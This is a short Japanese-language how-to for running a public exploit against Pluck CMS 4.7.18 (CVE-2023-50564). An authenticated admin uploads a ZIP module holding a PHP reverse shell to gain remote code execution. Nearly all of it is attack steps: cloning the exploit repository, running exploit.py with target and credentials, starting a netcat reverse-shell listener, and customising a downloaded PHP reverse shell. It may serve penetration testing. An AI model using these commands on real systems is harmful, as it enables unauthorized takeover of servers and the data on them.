
Pluck v4.7.18 - リモートコード実行 (RCE)
このエクスプロイトは、Pluck CMS v4.7.18 において認証済み管理者がPHPシェルを含む悪意のあるZIPモジュールをアップロードし、リモートコード実行(RCE)を可能にします。
installmodule エンドポイントにモジュールをアップロードするgit clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt
python3 exploit.py -h
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
まず、攻撃マシンでリバースシェルリスナーを起動します(このターミナルタブは終了しないでください):
nc -nvlp <ポートを指定>
次に、https://github.com/pentestmonkey/php-reverse-shell からPHPリバースシェルをダウンロードし、攻撃マシンに合わせてカスタマイズします(IP、ポート)。
別のタブでエクスプロイトコードを実行します:
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php